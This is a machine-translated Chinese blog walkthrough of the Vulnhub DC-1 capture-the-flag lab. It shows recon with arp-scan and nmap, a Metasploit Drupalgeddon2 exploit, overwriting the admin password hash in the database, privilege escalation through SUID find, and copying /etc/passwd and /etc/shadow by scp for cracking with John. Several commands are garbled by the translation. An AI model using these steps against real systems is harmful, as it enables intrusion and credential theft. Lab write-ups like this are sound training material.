vulhub怎么使用,vulhub通关教程
Vulnhub 1-DC简介:1前言为了更好的了解Kali渗透测试,我最近接触了Volunhub平台,一个免费提供漏洞目标飞行器进行渗透测试的平台。
准备DC:1无人机下载。
Kali系统(本实验使用Kali-Linux-2020-3-Live-AMD64-ISO)
目标机导入,VirtualBox和VMware都可以。
准备虚拟机,将目标无人机DC:1和攻击机kali系统设置在同一个局域网内。本实验采用(NAT模式)
目的验证DC 1号在实验中的引入。
DC-1是一个专门建造的易受攻击的实验室,目的是获得渗透测试领域的经验。它的难度取决于你的技能知识和学习能力。要成功完成这项挑战,您需要具备Linux技能,熟悉Linux命令行,并具备基本渗透测试工具的经验。
总共有五个标志,但最终目的是找到并读取根目录的主目录中的标志。您甚至不需要成为root用户来执行此操作,但是,您将需要root权限。
实验性局域网扫描:sudo arp-scan -l
不知道目标机的IP,先用arp扫描局域网。
已知扫描目标无人机DC:1的IP地址为192.168.11.142。
扫描端口以收集信息:sudo nmap 192.168.11.142
已知扫描DC:1的TCP端口22、80、111是开放的,从端口推断目标机器已经启动了web服务。
得出结论,使用Drupal搭建网站,搜索Drupal相关信息后进行下一步工作。
扫描漏洞并准备攻击。使用msf工具
漏洞搜索:搜索drupal
Drupal根据无人机的网站进行搜索。
漏洞利用:use exploit/UNIX/web app/Drupal _ drupalgeddon 2
可以依次进行攻击,最后成功攻击这个漏洞。
请参见参数选项显示选项
设置攻击域名,开始攻击。
设置rhosts 192.168.11.142漏洞
提示Meterpreter session 1打开,表示攻击成功,输入目标飞机。
进入目标无人机,进入shell,然后进入shell环境,查看文件,输入ls,找到目标文件flag1.txt
检查flag1.txt
干得好。您可能需要一个配置文件。根据这个提示,目标flag2应该在一个配置文件中。根据启动的web服务,下一个目标应该是web服务的配置文件。
查找www配置文件,一般查看配置文件需要权限。此时通过python弹起一个终端,获得普通用户权限:
python-c import pty;Pty.spawn(/困惑的声音/sh )
输入www配置文件。
成功找到标志2:
暴力攻击和字典攻击并不是获得访问权限的唯一方法(您将需要访问权限)。这些代金券可以用来做什么?
这里提示我们需要权限,可能是因为我们想获得root权限或者访问drupal网站。
尝试破解密码,登录drupal网站。
8.1根据数据库用户dbuser和flag2文件中的密码R0ck3t登录数据库。
8.2查看数据库内容:显示数据库,
进入数据库并查看表单内容:使用drupaldb,显示表格。
没有获得明显有用的内容。
8.3尝试查询数据库,查询所有用户:select * from user
8.4尝试更改用户admin的密码。
更新数据库中的源密码,并加载加密脚本以生成密码的哈希值。
PHP/var/www/scripts/password-hash . sh密码
加密脚本位于网站根目录下的scripts下,生成密码哈希值替换。
替换:更新drupaldb.users集pass
= $ S $DgNSiYzRbilwq18C5。d/pnvrvdokncm 5 w xbg 7 aidqwfnkdi 0 tjcl 其中name=" admin
登录网站查找内容(管理员密码)
找到目标标志3并查看内容。
特殊的PERMS将有助于找到密码-但你将需要命令执行,以确定如何获得隐藏的内容。
系统会提示我们获取权限以查看阴影中的内容。
获取root权限。
SUID是一种特殊的文件属性,它允许用户执行的文件以文件所有者的身份运行。查找SUID文件:
find/-user root-perm-4000-print 2/dev/null
找到“查找”命令。
通过find命令获得root权限:mkdir abc
ABC-exec /混乱的声音/嘘;
成功获得root权限,并成功提升权限。
检查/etc/shadow文件。
发现目标标志4
检查/etc/passwd文件。
破解flag4密码
连接本地服务器,发回/etc/passwd和/etc/shadow文件进行破解。
连接到本地服务器并构建ssh服务。
编辑ssh配置文件并启动服务。
找到# permitrootlogin禁止密码,删除之前的#,并将“禁止密码”更改为“是”。
找到PasswordAuthentication行,并删除它前面的#注释。如果后面说不是,那就需要修改成是。
打开ssh服务:sudo服务ssh启动
归还文件并破解它。
scp/etc/passwd kali @ 192 . 168 . 11 . 143:/home/kali/Desktop
scp/etc/shadow kali @ 192 . 168 . 11 . 143:/home/kali/桌面
使用unshadow命令将文件合并为一个文件。
先创建文件dopass,进入桌面,打开终端,因为返回的文件在桌面上。合并文件
sudo unshadow passwd shadow dopass
破解,用卡莉自己的约翰破解。有一个简单的方法来使用其他解密。
苏多约翰多帕斯
获取flag4的密码是橙色的
登录无人机DC:1
ssh flag4@192.168.11.142
查找并查看文件。
系统会提示我们以同样的方式获取root权限。
获取root权限。
根据提示,转到/root查看最终目标。
找到终极目标,查查内容,发现是作者的鼓励。这意味着我们成功实现了穿透目标无人机的目标。总之,通过攻击目标无人机DC:1,我更熟悉卡利的工具和命令的使用。
在渗透的过程中,不断学习,积累经验,从而得到成长。最后,我们成功实现了五个目标。
学习的过程就是不断的探索,所以继续加油吧!
并且感谢大家推荐的文章,Linux提电各种姿势总结。
Kali中msf的简单开发
如何破解linux用户账号密码一
Kali打开ssh服务。
使用开膛手约翰破解密码
郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。